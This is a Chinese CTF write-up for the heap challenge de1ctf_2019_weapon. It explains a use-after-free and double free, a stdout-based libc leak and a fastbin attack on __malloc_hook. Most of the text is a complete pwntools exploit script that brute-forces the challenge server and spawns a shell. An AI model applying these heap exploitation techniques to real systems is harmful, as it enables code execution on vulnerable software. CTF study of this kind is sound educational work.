de1ctf_2019_weapon:
保护全开
程序分析:
没法直接申请free到unsotbin中
此外,这个程序还没有泄露函数,只能靠IO去leak libc_base了
漏洞分析:
指针未清零,存在uaf
利用思路:
1.利用doublefree,伪造个unsortbin大小的chunk,释放到unsortbin中
2.再从unsortbin中割一块,里面的main_arena附近的地址会下移的性质,改到一个已释放的0x60大小的堆的fd(0x60大小是为了后面fastbin_attack),我们顺便在这把main_arena改为_IO_2_1_stdout_处,后面我们要申请堆块到这里,他们只有后四位不同,后三位是620,我们需要爆破一个字节,但实际为了能申请堆块到这里,我们需要找前面的0x7f,来绕过检查,也就是fastbin_attack
3.申请到_IO_2_1_stdout_处后,这么填payload = p64(0xfbad1800)+p64(0)*3+b"\x58" ,之后当程序遇到puts函数时就会打印_IO_write_base到_IO_write_ptr之间的内容,我们就泄露了libc。此外,这样改了后puts就没换行符了
4.泄露libc后,我们计算出one_gadget,利用double free,fastbin_attack申请堆到malloc_hook-0x23处(也是为了0x7f绕过检查),改malloc_hook为one_gadget,再申请就能开shell啦
exp:
from pwn import *
#from LibcSearcher import *
local_file = './de1ctf_2019_weapon'
local_libc = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 0
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',25789 )
libc = ELF(remote_libc)
elf = ELF(local_file)
#context.log_level = 'debug'
#context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
gdb.attach(r,cmd)
#---------------------------------
def add(size,index,name):
sla('choice >> \n','1')
sla('wlecome input your size of weapon: ',str(size))
sla('input index: ',str(index))
sa('input your name:\n',name)
def add2(size,index,name):
sla('choice >> ','1')
sla('wlecome input your size of weapon: ',str(size))
sla('input index: ',str(index))
sa('input your name:',name)
def delete(index):
sla('choice >> \n','2')
sla('input idx :',str(index))
def delete2(index):
sla('choice >> ','2')
sla('input idx :',str(index))
def edit(index,content):
sla('choice >> \n','3')
sla('input idx: ',str(index))
sa('new content:\n',content)
def edit2(index,content):
sla('choice >> ','3')
sla('input idx: ',str(index))
sa('new content:',content)
def pwn():
add(0x50,0,'a'*0x40+p64(0)+p64(0x61))
add(0x50,1,'aaaa')
add(0x60,2,'bbbb')
delete(1)
delete(0)
delete(1)
add(0x50,8,p8(0x50))
add(0x50,3,p64(0))
add(0x50,4,p64(0))
add(0x50,5,p64(0)+p64(0xd1))
add(0x20,3,'ppp')
add(0x20,3,'ppp')
delete(1)
delete(2)
add(0x50,7,'aaaa')
#--------------------
edit(2,p8(0xdd)+p8(0x25))
add(0x60,3,'a')
payload ='a'*0x33+p64(0xfbad1800)+p64(0)*3+b"\x58"
add(0x60,7,payload)
#debug()
libc_base=u64(r.recvuntil("\x7f",timeout=0.1)[-6:].ljust(8,'\x00'))-0x3C56A3
if (libc_base&0xfff)!=0:
exit(-1)
print hex(libc_base)
malloc_hook = libc_base +0x3c4b10
one_gadget = o_g_old[3]+libc_base
system=libc_base+libc.sym['system']
realloc=libc_base+libc.sym['realloc']
#----------------------------
add2(0x60,0,'a')
add2(0x60,1,'b')
delete2(0)
delete2(1)
delete2(0)
edit2(0,p64(malloc_hook-0x23))
add2(0x60,2,p64(0))
add2(0x60,3,'a'*(0x13)+p64(one_gadget))
sla('choice >> ','1')
sla('wlecome input your size of weapon: ',str(0x10))
sla('input index: ',str(8))
r.interactive()
#---------------------------------
if __name__ == "__main__":
while True:
r = remote('node4.buuoj.cn',26364)
#r=process('./de1ctf_2019_weapon')
try:
pwn()
except:
r.close()
其他:
能全靠自己堆出unsortbin和放到0x70的bin链中我还是很开心的,虽然堆了好久。
主要就是远端爆破太慢了,还不容易找出错误在哪,用one_gadget的话,有时还要realloc调整,就更久了
实在就是最好本地先把alsr关了,这样我们试出那个字节后,程序是不会变的,就能一直成功泄露
还有就是libc.sym找出来的偏移是不对的,不知道为什么
记一下gdb调试找偏移:
断点设在发送payload,改了IO_stdout之后
用vmmap看libc基址
脚本里有context.log_level = ‘debug’,能看到
0x7ffff7dd26a3-0x7ffff7a0d000=0x3C56A3
还有就是用readelf找偏移= =